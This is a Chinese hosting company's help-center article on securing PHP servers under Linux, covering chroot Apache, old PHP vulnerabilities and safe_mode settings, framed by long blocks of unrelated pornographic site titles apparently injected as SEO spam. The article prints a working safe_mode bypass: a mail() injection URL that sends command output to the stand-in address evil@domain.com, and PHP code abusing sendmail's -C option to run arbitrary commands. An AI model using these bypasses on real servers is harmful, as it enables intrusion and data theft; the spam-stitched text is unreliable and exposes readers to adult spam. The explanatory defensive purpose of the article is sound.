欧美视频在线第一页_午夜影视日本亚洲欧洲精品_成人性生交xxxxx网站_国产精品99久久久久久有的能看 _精品国产一二三四区_国产精品久久久久久久久果冻传媒_国产夫妻自拍一区_蜜桃久久精品一区二区_欧美极品欧美精品欧美视频_日本丰满少妇xxxx_欧美精品一区二区蜜桃_99视频精品在线

始創于2000年 股票代碼:831685
咨詢熱線:0371-60135900 注冊有禮 登錄
  • 掛牌上市企業
  • 60秒人工響應
  • 99.99%連通率
  • 7*24h人工
  • 故障100倍補償
您的位置: 網站首頁 > 幫助中心>文章內容

Linux操作系統下PHP服務器安全配置技巧

發布時間:  2012/8/11 11:06:00
  一、Web服務器安全PHP其實不過是Web服務器的一個模塊功能,所以首先要保證Web服務器的安全。當然Web服務器要安全又必須是先保證系統安全,這樣就扯遠了,無窮無盡。PHP可以和各種Web服務器結合,這里也只討論Apache。非常建議以chroot方式安裝啟動Apache,這樣即使Apache和PHP及其腳本出現漏洞,受影響的也只有這個禁錮的系統,不會危害實際系統。但是使用chroot的Apache后,給應用也會帶來一定的麻煩,比如連接mysql時必須用127.0.0.1地址使用tcp連接而不能用localhost實現socket連接,這在效率上會稍微差一點。還有mail函數發送郵件也是個問題,因為php.ini里的:
[mailfunction];ForWin32only.SMTP=localhost;ForWin32only.sendmail_from=me@localhost.com都是針對Win32平臺,所以需要在chroot環境下調整好sendmail。二、PHP本身問題1、遠程溢出PHP-4.1.2以下的所有版本都存在文件上傳遠程緩沖區溢出漏洞,而且攻擊程序已經廣泛流傳,成功率非常高:http://packetstormsecurity.org/0204-exploits/7350funhttp://hsj.shadowpenguin.org/misc/php3018_exp.txt2、遠程拒絕服務PHP-4.2.0和PHP-4.2.1存在PHPmultipart/form-dataPOST請求處理遠程漏洞,雖然不能獲得本地用戶權限,但是也能造成拒絕服務。3、safe_mode繞過漏洞還有PHP-4.2.2以下到PHP-4.0.5版本都存在PHPmail函數繞過safe_mode限制執行命令漏洞,4.0.5版本開始mail函數增加了第五個參數,由于設計者考慮不周可以突破safe_mode的限制執行命令。其中4.0.5版本突破非常簡單,只需用分號隔開后面加shell命令就可以了,比如存在PHP腳本evil.php:
<?mail("foo@bar,"foo","bar","",$bar);?>執行如下的URL:http://foo.com/evil.php?bar=;/usr/bin/id|mailevil@domain.com這將id執行的結果發送給evil@domain.com。對于4.0.6至4.2.2的PHP突破safe_mode限制其實是利用了sendmail的-C參數,所以系統必須是使用sendmail。如下的代碼能夠突破safe_mode限制執行命令:
<?#注意,下面這兩個必須是不存在的,或者它們的屬主和本腳本的屬主是一樣$script="/tmp/script123";$cf="/tmp/cf123";$fd=fopen($cf,"w");fwrite($fd,"OQ/tmpSparse=0R$*".chr(9)."$#local$@$1$:$1Mlocal,P=/bin/sh,A=sh$script");fclose($fd);$fd=fopen($script,"w");fwrite($fd,"rm-f$script$cf;");fwrite($fd,$cmd);fclose($fd);mail("nobody","","","","-C$cf");?>還是使用以上有問題版本PHP的用戶一定要及時升級到最新版本,這樣才能消除基本的安全問題。
三、PHP本身的安全配置PHP的配置非常靈活,可以通過php.ini,httpd.conf,.htaccess文件(該目錄必須設置了AllowOverrideAll或Options)進行設置,還可以在腳本程序里使用ini_set()及其他的特定的函數進行設置。通過phpinfo()和get_cfg_var()函數可以得到配置選項的各個值。如果配置選項是唯一PHP_INI_SYSTEM屬性的,必須通過php.ini和httpd.conf來修改,它們修改的是PHP的Master值,但修改之后必須重啟apache才能生效。其中php.ini設置的選項是對Web服務器所有腳本生效,httpd.conf里設置的選項是對該定義的目錄下所有腳本生效。如果還有其他的PHP_INI_USER,PHP_INI_PERDIR,PHP_INI_ALL屬性的選項就可以使用.htaccess文件設置,也可以通過在腳本程序自身用ini_set()函數設定,它們修改的是Local值,改了以后馬上生效。但是.htaccess只對當前目錄的腳本程序生效,ini_set()函數只對該腳本程序設置ini_set()函數以后的代碼生效。各個版本的選項屬性可能不盡相同,可以用如下命令查找當前源代碼的main.c文件得到所有的選項,以及它的屬性:
#grepPHP_INI_/PHP_SRC/main/main.c在討論PHP安全配置之前,應該好好了解PHP的safe_mode模式。1、safe_modesafe_mode是唯一PHP_INI_SYSTEM屬性,必須通過php.ini或httpd.conf來設置。要啟用safe_mode,只需修改php.ini:safe_mode=On或者修改httpd.conf,定義目錄:
<Directory/var/www>OptionsFollowSymLinksphp_admin_valuesafe_mode1</Directory>重啟apache后safe_mode就生效了。啟動safe_mode,會對許多PHP函數進行限制,特別是和系統相關的文件打開、命令執行等函數。所有操作文件的函數將只能操作與腳本UID相同的文件,比如test.php腳本的內容為:
<?include("index.html")?>幾個文件的屬性如下:#ls-latotal13drwxr-xr-x2rootroot104Jul2001:25.drwxr-xr-x16rootroot384Jul1812:02..-rw-r--r--1rootroot4110Oct262002index.html-rw-r--r--1www-datawww-data41Jul1919:14test.php在瀏覽器請求test.php會提示如下的錯誤信息:Warning:SAFEMODERestrictionineffect.Thescriptwhoseuid/gidis33/33isnotallowedtoaccess./index.htmlownedbyuid/gid0/0in/var/www/test.phponline1如果被操作文件所在目錄的UID和腳本UID一致,那么該文件的UID即使和腳本不同也可以訪問的,不知這是否是PHP的一個漏洞還是另有隱情。所以php腳本屬主這個用戶最好就只作這個用途,絕對禁止使用root做為php腳本的屬主,這樣就達不到safe_mode的效果了。如果想將其放寬到GID比較,則打開safe_mode_gid可以考慮只比較文件的GID,可以設置如下選項:safe_mode_gid=On設置了safe_mode以后,所有命令執行的函數將被限制只能執行php.ini里safe_mode_exec_dir指定目錄里的程序,而且shell_exec、`ls-l`這種執行命令的方式會被禁止。如果確實需要調用其它程序,可以在php.ini做如下設置:safe_mode_exec_dir=/usr/local/php/exec然后拷貝程序到該目錄,那么php腳本就可以用system等函數來執行該程序。而且該目錄里的shell腳本還是可以調用其它目錄里的系統命令。safe_mode_include_dirstring當從此目錄及其子目錄(目錄必須在include_path中或者用完整路徑來包含)包含文件時越過UID/GID檢查。從PHP4.2.0開始,本指令可以接受和include_path指令類似的風格用分號隔開的路徑,而不只是一個目錄。指定的限制實際上是一個前綴,而非一個目錄名。這也就是說“safe_mode_include_dir=/dir/incl”將允許訪問“/dir/include”和“/dir/incls”,如果它們存在。如果您希望將訪問控制在一個指定的目錄,那么請在結尾加上一個斜線,例如:“safe_mode_include_dir=/dir/incl/”。safe_mode_allowed_env_varsstring設置某些環境變量可能是潛在的安全缺口。本指令包含有一個逗號分隔的前綴列表。在安全模式下,用戶只能改變那些名字具有在這里提供的前綴的環境變量。默認情況下,用戶只能設置以PHP_開頭的環境變量(例如PHP_FOO=BAR)。注:如果本指令為空,PHP將使用戶可以修改任何環境變量!safe_mode_protected_env_varsstring本指令包含有一個逗號分隔的環境變量的列表,最終用戶不能用putenv()來改變這些環境變量。甚至在safe_mode_allowed_env_vars中設置了允許修改時也不能改變這些變量。雖然safe_mode不是萬能的(低版本的PHP可以繞過),但還是強烈建議打開安全模式,在一定程度上能夠避免一些未知的攻擊。不過啟用safe_mode會有很多限制,可能對應用帶來影響,所以還需要調整代碼和配置才能和諧。被安全模式限制或屏蔽的函數可以參考PHP手冊。討論完safe_mode后,下面結合程序代碼實際可能出現的問題討論如何通過對PHP服務器端的配置來避免出現的漏洞。
本文出自:億恩科技【www.beingsafe.com.cn】

服務器租用/服務器托管中國五強!虛擬主機域名注冊頂級提供商!15年品質保障!--億恩科技[ENKJ.COM]

  • 您可能在找
  • 億恩北京公司:
  • 經營性ICP/ISP證:京B2-20150015
  • 億恩鄭州公司:
  • 經營性ICP/ISP/IDC證:豫B1.B2-20060070
  • 億恩南昌公司:
  • 經營性ICP/ISP證:贛B2-20080012
  • 服務器/云主機 24小時售后服務電話:0371-60135900
  • 虛擬主機/智能建站 24小時售后服務電話:0371-60135900
  • 專注服務器托管17年
    掃掃關注-微信公眾號
    0371-60135900
    Copyright© 1999-2019 ENKJ All Rights Reserved 億恩科技 版權所有  地址:鄭州市高新區翠竹街1號總部企業基地億恩大廈  法律顧問:河南亞太人律師事務所郝建鋒、杜慧月律師   京公網安備41019702002023號
      0
     
     
     
     

    0371-60135900
    7*24小時客服服務熱線

     
     
    日批视频免费在线观看| 亚洲国产精品免费| 午夜欧美性电影| 免费a级片在线观看| 久热精品视频在线免费观看| www成人啪啪18软件| 丰满岳妇乱一区二区三区| 做爰高潮hd色即是空| 久久99精品视频| 91国产精品91| 青青草av在线播放| 国产视频久久久久| 熟女俱乐部一区二区视频在线| 一区二区三区资源| 青少年xxxxx性开放hg| 岛国片在线免费观看| 激情偷乱视频一区二区三区| 91麻豆精品国产91久久久久久 | 日韩高清欧美高清| 手机视频在线观看| **欧美大码日韩| 中文字幕av导航| 成人h版在线观看| 国产一区二区三区黄| 肉色丝袜一区二区| 国产视频精品自拍| 性欧美办公室18xxxxhd| www.88av| 日韩激情av在线免费观看| 日韩在线不卡一区| 欧美 日韩 综合| 国产精品久久久久久久久久ktv| 天天干天天操天天拍| 精品日韩欧美一区二区| 精品人妻一区二区三区蜜桃视频| 日韩亚洲综合在线| 欧美激情一区三区| 亚洲视频久久久| 欧美a在线播放| 水蜜桃一区二区| 欧美午夜精品久久久久久超碰| 欧美日韩亚洲国产另类| 久久99国产精品自在自在app| 成年人视频在线免费看| 久久精品中文字幕一区二区三区 | 日本综合在线观看| 欧美专区日韩视频| 久久在线免费观看| 97热精品视频官网| 国产精品青草综合久久久久99| 日本一二三区在线观看| 国产欧美精品一二三| 亚洲人高潮女人毛茸茸| 一区二区成人在线视频| 狠狠色综合色综合网络| 99免费视频观看| 亚洲毛片在线观看| 天堂va蜜桃一区二区三区| 777久久久精品一区二区三区| 91精品国产欧美日韩| 欧美xxxxx少妇| 999精品在线观看| 欧美性xxxx极品高清hd直播| 好看的av在线| 91制片厂免费观看| 2021中文字幕一区亚洲| 阿v天堂2014| 99c视频在线| xx视频.9999.com| 亚洲精品电影久久久| 欧美三级日韩三级国产三级| 国产精品国产三级国产普通话三级| 性欧美8khd高清极品| 男人的天堂99| 亚洲欧美一区二区三区四区| 久久久无码精品亚洲日韩按摩| 最新一区二区三区| 国模吧一区二区三区| 国产成人在线视频网址| 国产精品毛片一区二区在线看舒淇| 精品国偷自产一区二区三区| 亚洲欧美日韩一区二区在线| 欧美激情资源网| 久久66热这里只有精品| 亚洲午夜av久久乱码| 久久久国产精华| 久久久久久**毛片大全| 久久久久久黄色| 2020国产精品自拍| 欧美国产日韩精品免费观看| 亚洲 国产 欧美 日韩| 日韩视频第二页| 欧美丰满片xxx777| 欧美在线观看一二区| 91色乱码一区二区三区| 国产成人无码a区在线观看视频| 日韩精品一区二区三区视频在线观看| 黄网站色欧美视频| 日日欢夜夜爽一区| 中文字幕av播放| 日韩中文字幕在线视频| 天堂免费在线视频| 韩国黄色一级片| 久久久成人精品一区二区三区| 亚洲第一综合| 又粗又黑又大的吊av| 亚洲性生活网站| 国产中文字幕免费观看| 精品少妇一区二区三区在线| 国产日韩欧美一区二区| 欧美视频中文一区二区三区在线观看| 国产九九视频一区二区三区| 圆产精品久久久久久久久久久| 国产成人亚洲综合无码| 亚洲图中文字幕| 亚洲国产视频一区二区| 欧美一激情一区二区三区| 91亚洲精品视频| 欧美污视频网站| 一本一本久久a久久精品综合小说| a级片在线视频| 中文字幕 亚洲一区| 成年人网站大全| 自拍偷拍亚洲精品| 亚洲欧美日韩电影| 欧美性猛交xxx| 自拍偷拍亚洲激情| 日韩性xxxx| 亚洲天堂av片| 91久久久久久国产精品| 欧美激情第99页| 亚洲人午夜精品| 97国产真实伦对白精彩视频8| wwwxx欧美| 日韩精品一区二区三区久久| 午夜视频在线观看国产| 性生活在线视频| 宅男一区二区三区| 国产富婆一区二区三区 | 91成人福利在线| 中日韩美女免费视频网址在线观看| 亚洲精品国产精品国| 成人黄色一级大片| 国产日韩精品电影| 日韩一区二区免费视频| 亚洲激情综合网| 欧美性色视频在线| 亚洲视频在线一区二区| 国产日韩三级在线| 中文字幕av一区 二区| 国产精品久久久久永久免费观看 | 欧美一区二区福利| 日韩高清av一区二区三区| 久久国内精品视频| a天堂在线视频| 久久色在线视频| 国产欧美精品一区aⅴ影院| 精品国产av一区二区| 一区二区美女视频| 性做久久久久久久久久| 亚洲 欧美 综合 另类 中字| 日韩视频第二页| 玩弄中年熟妇正在播放| 国产探花视频在线播放| 黑人操亚洲女人| 欧美日韩国产黄| xxx欧美精品| 国产精品青青在线观看爽香蕉 | 欧美日韩五月天| 欧美日韩在线播放三区| 亚洲人亚洲人成电影网站色| 老司机精品视频在线| 久久99深爱久久99精品| 欧美一区二区三区系列电影| 亚洲最新av在线| 久久久久久久一| 国产伦理久久久| 欧美不卡一区二区| 在线观看日韩欧美| 高清在线视频日韩欧美| 91久久线看在观草草青青| 久久精品国产v日韩v亚洲| 成人动漫网站在线观看| 99精品国产一区二区| 欧美激情一区二区三区在线视频 | 欧美午夜片在线观看| 26uuu色噜噜精品一区二区| 成人性色生活片| 亚洲高清一区二| 国产精品美女呻吟| 国产一区二区无遮挡 | 伊人久久中文字幕| 男人操女人动态图| 一级黄在线观看| 成人av电影在线网| 精品亚洲aⅴ在线观看| 日本精品福利视频| www毛片com| 国产亚洲1区2区3区| 欧美日韩久久一区二区| 亚洲九九九在线观看| 在线丨暗呦小u女国产精品| 欧美最猛性xxxxx亚洲精品| 久久免费视频1| a级网站在线观看| 99久久国产综合精品五月天喷水| www.中文字幕av| 成人动漫中文字幕| 欧美一级一区二区| 91精品国产一区二区三区动漫| 手机看片福利盒子久久| 蜜桃狠狠色伊人亚洲综合网站| 人妻巨大乳一二三区| 五月婷婷激情五月| 欧美一区二区三区小说| 缅甸午夜性猛交xxxx| 日本免费新一区视频| 国产亚洲精品久久久优势| 亚洲国产午夜伦理片大全在线观看网站| 精品一区在线观看视频| 日韩高清欧美激情| 亚洲永久精品大片| 久久不射热爱视频精品| 国产伦精品一区二区三区照片| 天天操精品视频| 日本丰满少妇做爰爽爽| 日韩二区三区四区| 国产一二精品视频| 久久亚洲精精品中文字幕早川悠里| 亚洲欧洲精品成人久久奇米网| 亚洲久草在线视频| 日韩一区二区在线视频| 浮妇高潮喷白浆视频| hs视频在线观看| 99久久精品免费看国产免费软件| 亚洲天堂免费观看| www.久久久久久久久久久| 久久婷婷丁香| 亚洲一区二区偷拍精品| 中文字幕精品—区二区日日骚| 午夜精品久久久久久久爽| 亚洲国产精品系列| 亚洲天堂av免费在线观看| 午夜爽爽爽男女免费观看| 人妻无码一区二区三区久久99| 色婷婷精品久久二区二区蜜臂av| 日韩av片永久免费网站| 国产精品69页| 天天操天天干天天| 国产成人精品免费网站| 亚洲乱码精品一二三四区日韩在线| 欧美一级二级在线观看| 国产成人在线亚洲欧美| 亚洲图片在线观看| 国产喷水吹潮视频www| 欧美精品在线视频| 精品国产欧美成人夜夜嗨| 116极品美女午夜一级| 亚洲AV无码国产精品午夜字幕| 日韩电影大片中文字幕| 成年人免费观看视频网站| 日韩三区在线观看| 亚洲ⅴ国产v天堂a无码二区| 欧美日韩性视频在线| 欧洲亚洲一区二区| 国产精华7777777| 中文文精品字幕一区二区| 欧美高清在线观看| 好吊色视频一区二区三区| 无码精品人妻一区二区三区影院| 久久中文精品视频| 91插插插插插插插插| 国产一级在线观看视频| 国产精品一区免费在线观看| 欧美成人r级一区二区三区| 成人国产一区二区| 国产精品揄拍100视频| 亚洲六月丁香色婷婷综合久久| 成人做爽爽免费视频| 国产一区免费看| 91精品国产综合久久香蕉的特点| 精品欧美一区免费观看α√| 91伊人久久大香线蕉| 9久久9毛片又大又硬又粗| 欧美色欧美亚洲高清在线视频| 超碰人人cao| 日韩国产精品亚洲а∨天堂免| 免费中文字幕视频| 久久国产成人午夜av影院| 2019中文字幕免费视频| 精品人体无码一区二区三区| 亚洲成人激情综合网| 裸体裸乳免费看| 老司机午夜精品视频在线观看| 久久久久久久久久久久av| 少妇无套高潮一二三区| 美日韩一级片在线观看| 亚洲图中文字幕| 国产欧美在线一区| 蜜乳av另类精品一区二区| 亚洲精品成人久久电影| 色综合色综合色综合色综合| 性久久久久久久久| 欧美精品一区二区三区免费播放| 91一区在线观看| 91网站免费看| 99久久久国产精品无码免费| 久久久久久久久久久亚洲| 石原莉奈在线亚洲二区| 男女激情免费视频| 日韩久久久久久| 中文字幕欧美色图| 免费一区二区三区| 国产婷婷色一区二区三区四区| 欧美日韩精品一区| 日韩国产欧美在线观看| 51午夜精品视频| 99精品在线视频观看| 97超碰国产精品女人人人爽 | 久久综合精品国产一区二区三区| 久久99亚洲热视| 欧美丰满艳妇bbwbbw| 亚洲精品456在线播放狼人| 国产又粗又大又爽视频| 国产伊人精品在线| 丝袜美腿一区二区三区| 久久精品五月婷婷| www.色精品| 国产精品久久久久久久久影视 | 午夜av免费看| 日韩高清av一区二区三区| 中文字幕在线观看免费| 国产一二三四区在线观看| 亚洲一区二区精品3399| 国产一级片黄色| 天天亚洲美女在线视频| 少妇高潮惨叫久久久久| 亚洲人在线观看| 97成人免费视频| 久久久久久久久一区| 国产精品人成在线观看免费| 成人性生交大片免费看视频直播| 亚洲一级片免费看| 狠狠色伊人亚洲综合网站色| 国产精品亚洲а∨天堂免在线| 每日在线更新av| 777午夜精品视频在线播放| 欧美黄片一区二区三区| 成人久久18免费网站图片| 十八禁一区二区三区| 久久伊人一区| 99r国产精品| 蜜臀视频一区二区三区| 欧美午夜视频网站| 欧美日韩偷拍视频| 亚洲欧美日韩另类| 日韩欧美不卡视频| 欧美一区二区三区……| 久久精品99国产精品| 宇都宫紫苑在线播放| 国产精品久久久久久超碰| 成人综合婷婷国产精品久久蜜臀| 中文字幕の友人北条麻妃| 69成人精品免费视频| 国产黄色免费大片| 久久亚洲一区二区| 麻豆国产一区二区| 男女无套免费视频网站动漫| 精品剧情在线观看| 天堂av中文字幕| 日本xxxxxxxxxx75| 久久精品国产一区| 99天天综合性| 国产ts丝袜人妖系列视频 | 亚洲精品你懂的| 最近中文字幕在线mv视频在线| 中文字幕亚洲一区二区三区五十路 | 亚洲一区二区福利| 99精品久久久久久| 51妺嘿嘿午夜福利| 国产999在线观看| 亚洲欧美色一区| 国产成人在线免费观看视频| 亚洲自拍小视频| 久久成人免费网| mm131国产精品| 欧美在线视频网| 国产亚洲一区二区三区四区| 精品人妻伦九区久久aaa片| 艳色歌舞团一区二区三区| 色av中文字幕一区| 精品人妻伦一区二区三区久久| 91亚洲精品在线| 亚洲视频资源在线| 日本成人精品视频| 亚洲va久久久噜噜噜久久天堂| 午夜精品一区二区三区免费视频 | 欧美日韩福利在线观看| 精品国产乱码久久久久酒店| 成人涩涩小片视频日本| 欧美精品人人做人人爱视频| 精品国产999| 日本va欧美va精品| 男人的天堂影院| 2019中文字幕全在线观看| 老熟妇高潮一区二区高清视频| 亚洲欧美一区二区三区不卡| 成人黄色网免费| 亚洲精品高清在线| 人人妻人人玩人人澡人人爽|